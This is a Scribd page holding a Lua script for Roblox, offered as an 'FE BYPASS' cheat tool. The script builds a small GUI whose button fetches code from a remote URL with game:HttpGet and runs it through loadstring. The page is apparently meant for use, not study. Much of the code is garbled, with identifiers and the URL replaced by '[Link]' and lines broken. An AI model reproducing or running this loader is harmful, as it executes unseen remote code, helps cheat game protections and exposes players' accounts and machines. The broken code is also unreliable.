60% found this document useful (5 votes)
2K views1 page

FE Bypass GUI Script for Roblox

The document contains a Lua script for creating a GUI in Roblox with a draggable frame and a button labeled 'FE BYPASS'. When clicked, the button executes a script from a specified URL. The GUI is styled with specific colors and properties for visual appeal.

Uploaded by

rconstentine
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
60% found this document useful (5 votes)
2K views1 page

FE Bypass GUI Script for Roblox

The document contains a Lua script for creating a GUI in Roblox with a draggable frame and a button labeled 'FE BYPASS'. When clicked, the button executes a script from a specified URL. The GUI is styled with specific colors and properties for visual appeal.

Uploaded by

rconstentine
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd

local ScreenGui = Instance.

new("ScreenGui")
local Frame = [Link]("Frame")
local TextButton_3 = [Link]("TextButton")

--Properties:

[Link] = [Link]
[Link] = [Link]

[Link] = ScreenGui
Frame.BackgroundColor3 = [Link](0, 0, 0)
Frame.BorderColor3 = [Link](0, 0, 0)
[Link] = 0
[Link] = [Link](0.5, -199, 0.9, -280)
[Link] = [Link](0, 352, 0, 283)
[Link] = true
[Link] = true

[Link] = Frame
TextLabel.BackgroundColor3 = [Link](38, 0, 255)
TextLabel.BorderColor3 = [Link](0, 0, 0)
[Link] = 0
[Link] = [Link](0.0767045468, 0, 0.123674914, 0)
[Link] = [Link](0, 298, 0, 46)
[Link] = [Link]
[Link] = "FE BYPASS v2.4 By OrzScript"
TextLabel.TextColor3 = [Link](0, 0, 0)
[Link] = 14.000

TextButton_3.Parent = Frame
TextButton_3.BackgroundColor3 = [Link](43, 0, 255)
TextButton_3.BorderColor3 = [Link](0, 0, 0)
TextButton_3.BorderSizePixel = 0
TextButton_3.Position = [Link](0.326704532, 0, 0.614840984, 0)
TextButton_3.Size = [Link](0, 120, 0, 35)
TextButton_3.Font = [Link]
TextButton_3.Text = "FE BYPASS"
TextButton_3.TextColor3 = [Link](0, 0, 0)
TextButton_3.TextSize = 14.000
TextButton_3.MouseButton1Click:Connect(function()
loadstring(game:HttpGet("[Link]
TOP-SECRET-/main/FE%20Bypass%[Link]",true))()
end)

You might also like